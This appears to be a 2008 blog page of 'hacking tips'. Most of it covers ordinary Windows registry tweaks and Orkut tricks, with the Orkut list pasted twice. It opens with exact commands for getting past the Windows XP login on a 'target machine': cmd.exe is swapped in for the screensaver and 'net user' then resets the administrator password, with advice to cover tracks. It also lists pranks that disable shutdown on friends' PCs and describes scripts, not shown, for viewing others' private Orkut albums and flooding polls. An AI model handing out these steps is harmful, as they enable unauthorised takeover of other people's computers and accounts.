Sunday, April 20, 2008

hacking tips for windows

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ *drops to rootcd\windows\system32 *directs to the system32 dirmkdir temphack *creates the folder temphackcopy logon.scr temphack\logon.scr *backsup logon.scrcopy cmd.exe temphack\cmd.exe *backsup cmd.exedel logon.scr *deletes original logon.scrrename cmd.exe logon.scr *renames cmd.exe to logon.screxit *quits dos
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks


Registry Hacking

Display legal notice on startup:Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.REGEDIT[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnoticecaption"="enter your notice caption""legalnoticetext"="enter your legal notice text"
Automatic Administrator Login:Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.REGEDIT 4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"AutoAdminLogon"="1"
No Shutdown:Wanna play with your friends by removing the shutdown option from start menu in their computer.Just hack it down !!!RegeditHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer"NoClose"="DWORD:1"
Menu Delays:
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.
GPEDIT.MSC And Autoplay
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.
Increasing options in add/remove programs:
Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]NtComponents=ntoc.dll,NtOcSetupProc,,4WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7Display=desk.cpl,DisplayOcSetupProc,,7Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7iis=iis.dll,OcEntry,iis.inf,,7com=comsetup.dll,OcEntry,comnt5.inf,hide,7dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6ims=imsinsnt.dll,OcEntry,ims.inf,,7fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".
Automatically Kill Programs At Shutdown:
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.
Speeding Up Share Viewing:
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!
Create a Shortcut to Lock Your Computer
Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient. Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Hack the Windows Explorer Shortcut Menu





The right-click menu in Windows Explorer is quite useful; right-click a file and a menu appears, letting you take a variety of actions, such as opening the file, printing it, deleting it, copying it, creating a shortcut to it, and so on. Figure 1 shows you the screen you'll see. (Note that the "Scan with…" option is only available if you install antivirus software, such as avast! Anti-virus.)








Figure 1. The normal menu that appears when you right-click a file in Windows Explorer
But there's a way to power up the menu. Hold down the Shift key as you right-click a file, and you get several new menu options, as you can see circled in Figure 2.
Figure 2. The options circled are added when you hold down Shift when right-clicking a file.
Here's what the options do:
Open as Read-Only: As the name says, it opens the file as a read-only file.
Pin to Start Menu: This pins a shortcut to the file in the top section of the Start menu. To remove the shortcut to the file from the Start menu, right-click the shortcut and select "Remove from this list."
Add to Quick Launch: This adds a shortcut to the file to the Quick Launch toolbar, on the left side of the Taskbar. To remove the shortcut, right-click it and choose Delete.
Copy as Path: This copies the file name and path to the Windows clipboard, for example, C:\Budget\2007 memo.xls. You can then paste the text wherever you want.


Hack Windows Vista Screensavers
Windows Vista's screensavers, for incomprehensible reasons, cannot be customized using the user interface. Want to change the way bubbles look in the Bubbles screensaver? Forget about it. You won't find a way to do it.
You can, though, hack the Windows Registry to customize many of the screensavers. For the Bubbles screensaver, for example, you can add three new values to the Registry, and turn the bubbles metallic or keep them transparent; configure whether the bubbles should have shadows; and display the bubbles against the desktop or instead against a solid black background.
To do it, open the Registry Editor, then go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Screensavers\Bubbles. Select Edit-->New DWORD (32-bit) Value, and create a new DWORD called MaterialGlass. Give it a value of 1 for glassy, transparent bubbles, and a value of 0 for metallic bubbles.
Create a DWORD called ShowShadows, and give it a value of 1 to display shadows below the bubbles, and a value of 0 to have no shadow displayed.
Create a DWORD called ShowBubbles and give it a value of 1 to show the bubbles on the desktop, and a value of 0 to show them against a solid black background.
When you exit the Registry Editor, your new settings will take effect.
You can similarly hack the Ribbons screensaver. Open the Registry Editor, then go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Screensavers\Ribbons. Select Edit-->New DWORD (32-bit) Value, and create a new DWORD called NumRibbons. Click Decimal, and then type in the number of ribbons you want to be displayed. The minimum number of ribbons is 1; the maximum is 256.
Create a DWORD called RibbonWidth, click Decimal, and then type in a number to determine the width of each ribbon. The smaller the number, the narrower the ribbon.
When you exit the Registry Editor, your new settings will take effect.
To go back to your old settings, delete the Registry values.

Friday, April 18, 2008

Increasing network browsing speed

In order to do this, you will have to hack the System Registry and delete a reference to a key so that this feature will not be loaded. To do this, follow these steps:
Open up the Registry Editor by clicking the Start Menu and selecting Run. Then type regedit in the text box and click the OK button. Once the Registry Editor has loaded, expand the HKEY_LOCAL_MACHINE key. Next, expand Software and then Microsoft. Locate Windows and expand that as well. You will want to be editing the main system files, so expand CurrentVersion. Because this feature is a feature of the Windows component known as Explorer, expand the Explorer key. Next, you will want to modify the remote computer settings, so expand the RemoteComputer key and then expand the NameSpace key to show all of the features that are enabled when you browse to a remote computer. In the NameSpace folder you will find two entries. One is "{2227A280-3AEA-1069-A2DE-08002B30309D}" which tells Explorer to show printers shared on the remote machine. The other, "{D6277990-4C6A-11CF-8D87-00AA0060F5BF}," tells Explorer to show remote scheduled tasks. This is the one that you should delete. This can be done by right-clicking the name of the key and selecting Delete.

burn files larger than 703 mb

This allows you to burn files larger than 703mb to CD, Be Careful though adding to much can cause errors,
try not to burn more than 800mb to a 700mb cd


Step 1: Open Nero Burning Rom (Not Nero Express) and goto File>Preferences

Step 2:Select Expert Features

Step 3:Tick the Enable Disk-at-once CD Overburning and set to 99 min,then tick the Enable generation of a short leadout

now select apply and ok

For more details, Register at http://DarksideRG.com and see this thread:

UKB-KVCD Release Group " The Files To Big Wtf !! ", Overburning with Nero Burning Rom


Respect to UKB-KVCD for this Tutorial

BugZ is in no way associated with UKB-KVCD Release Group

ORKUT TRICKS





Scrap All
Just open orkut page and copy this script in URL bar.

Hit enter.
It sends scrap to all the friend's automatically.


Unlock Any Scrapbook
Just open orkut page and copy this script in URL bar.

Hit enter.
It unlocks all scrapbooks automatically.


Unlock Any Album
Just open orkut page and copy this script in URL bar.

Hit enter.
It unlocks all albums automatically.


Increase your fans
Just open orkut page and copy this script in URL bar.

Hit enter.
It increase your fans within minutes.


Show Video Instead Of Profile Picture
Just open orkut page and copy this script in URL bar.

Hit enter.
It replaces video with your profile picture.


Scrapbook Flooder
Open scrapbook.
Write something in the text box.
Donot press submit
Copy the following java script into the URL bar.

Hit enter.
Close the window or press refresh to stop the flooding.



Add a Friend
This code will add your friend automatically when you run this script.
Run the on your friend's profile whom you want to add.
Paste the script and run on the page you have opened(friend's profile).

Paste the script in URL and hit enter.You are done!!


Poll Flooder
Just open the Polls you to have flood and paste the script on address bar.
Hit Enter.
After running this script all the options in the poll will be selected,then you have to press vote.So that you w'll be voting all the options at a time.
This Script which will flood all the options at once but only for one time.


Testimonial to All
This Script is used to send testi to all your friend's.
Open this Page and run the script.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page.


Album Hack
This Script will show or display the pictures which are hidden in friend's profile.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page.


Mass scrap deleter
Open your scrapbook.
Copy the following java script into the URL bar.

Hit enter.
Close the window or press refresh to stop the deleting.


Coloured scraps
Write anything in text box
Copy the script and paste it in URL bar.
Presss enter
Now submit the scrap



Message Reverser
Open scrapbook
Write text in text box.
Copy the script in URL bar and hit enter.
Now submit the scrap



Dictionary in orkut
Copy the script in URL bar and hit enter.
Write the desired word and get its meaning.



Profile without picture
Use this script while you are in cropping stage



Album flooder
Goto http://www.orkut.com/Album.aspx
Then browse pic which u want to flood after selection run this script.



Vibrator in orkut
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all to your hot list
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all to your ignore list
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all ur friends to ur crush list
Open this Page and run the script.
Allow all pop ups of orkut.com



Empty ur crush list



View UID's of all friends
Copy the script in in friend's list.
Hit enter



View all community ids
Copy the scipt in communities page.
Hit enter.



Post same topic in selected communities
Paste all the community UID,s in the given format cmm=['42454897','5866948']; (even a comma makes a difference)
Open any non-anonymous community
Type the Subject and Body[colour and smileys allowed]
Run the script and allow all pop ups.

You will find the topic(posted by you) in all the selected communities


See your signature and token id
Copy the script in scrapbook URL bar and hit enter.




ORKUT TRICKS





Scrap All
Just open orkut page and copy this script in URL bar.

Hit enter.
It sends scrap to all the friend's automatically.


Unlock Any Scrapbook
Just open orkut page and copy this script in URL bar.

Hit enter.
It unlocks all scrapbooks automatically.


Unlock Any Album
Just open orkut page and copy this script in URL bar.

Hit enter.
It unlocks all albums automatically.


Increase your fans
Just open orkut page and copy this script in URL bar.

Hit enter.
It increase your fans within minutes.


Show Video Instead Of Profile Picture
Just open orkut page and copy this script in URL bar.

Hit enter.
It replaces video with your profile picture.


Scrapbook Flooder
Open scrapbook.
Write something in the text box.
Donot press submit
Copy the following java script into the URL bar.

Hit enter.
Close the window or press refresh to stop the flooding.



Add a Friend
This code will add your friend automatically when you run this script.
Run the on your friend's profile whom you want to add.
Paste the script and run on the page you have opened(friend's profile).

Paste the script in URL and hit enter.You are done!!


Poll Flooder
Just open the Polls you to have flood and paste the script on address bar.
Hit Enter.
After running this script all the options in the poll will be selected,then you have to press vote.So that you w'll be voting all the options at a time.
This Script which will flood all the options at once but only for one time.


Testimonial to All
This Script is used to send testi to all your friend's.
Open this Page and run the script.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page.


Album Hack
This Script will show or display the pictures which are hidden in friend's profile.
Paste the following javascript in your web browser address bar after navigating to the specified orkut page.


Mass scrap deleter
Open your scrapbook.
Copy the following java script into the URL bar.

Hit enter.
Close the window or press refresh to stop the deleting.


Coloured scraps
Write anything in text box
Copy the script and paste it in URL bar.
Presss enter
Now submit the scrap



Message Reverser
Open scrapbook
Write text in text box.
Copy the script in URL bar and hit enter.
Now submit the scrap



Dictionary in orkut
Copy the script in URL bar and hit enter.
Write the desired word and get its meaning.



Profile without picture
Use this script while you are in cropping stage



Album flooder
Goto http://www.orkut.com/Album.aspx
Then browse pic which u want to flood after selection run this script.



Vibrator in orkut
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all to your hot list
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all to your ignore list
Just open orkut page and copy this script in URL bar.

Hit enter.


Add all ur friends to ur crush list
Open this Page and run the script.
Allow all pop ups of orkut.com



Empty ur crush list



View UID's of all friends
Copy the script in in friend's list.
Hit enter



View all community ids
Copy the scipt in communities page.
Hit enter.



Post same topic in selected communities
Paste all the community UID,s in the given format cmm=['42454897','5866948']; (even a comma makes a difference)
Open any non-anonymous community
Type the Subject and Body[colour and smileys allowed]
Run the script and allow all pop ups.

You will find the topic(posted by you) in all the selected communities


See your signature and token id
Copy the script in scrapbook URL bar and hit enter.




Thursday, January 3, 2008

Nero Burning Rom 8.2.8.0

Download Nero 7 Premium from FileHippo.com

WindowBlinds 6.0.1

Download WindowBlinds from FileHippo.com

fun with orkut

View Friends Scrap more Than the Limit

View Friends Scrap more Than the Limit

Step1: Open Friends scrapbook

Step2: Look in your address bar (i.e the place where u type www.mastitrain.com). You will see this address written
http://www.orkut.com/Scrapbook.aspx?uid=12345678987654321

Step3: Add this code"&na=&nst=&nid=&pageSize=30" at the end of the address. It will look like this
http://www.orkut.com/Scrapbook.aspx?uid=12345678987654321&na=&nst=&nid=&pageSize=30

30 over specifies that you can view 30 scraps of the scrapbook you are looking into.
If u like our work Do Refer Your Friends so that we can continue
Scrap Without name Scrap Without name


For sending scraps without name follow the steps:
1) Open edit profile
2) Delete First and Second Name
3) Then on the first name text box type ALT + 0173 (i.e. Type 0173 while pressing the ALT key of your keyboard.)
4) Do the same in the Second Name Box.
5) Click Update.
Now you are done you can send scraps without your name

Send Invisible Scrap Magic Scrap
Send Invisible ScrapSo, Friend's welcome to the very first orkut trick.
Step1: Open scrapbook
Step2: Write [i] and submit it, an invisible scrap will b send
Note: Don't Write Anything Else [i]You can try these various combinations also if u want to send a big no of invisible scraps, as after your few submissions it will start displaying the message "message sent too recently". So try these combinations out:[u][b][i][u][i][b][u][i][u][b][u][i][b][i][u][b][i][u][b][i]... And just keep on increasing it will continue no limits... One more methodEnter &#3021 no space b/w the symbol and number, blank scrap will be send.

Monday, December 17, 2007

 
Google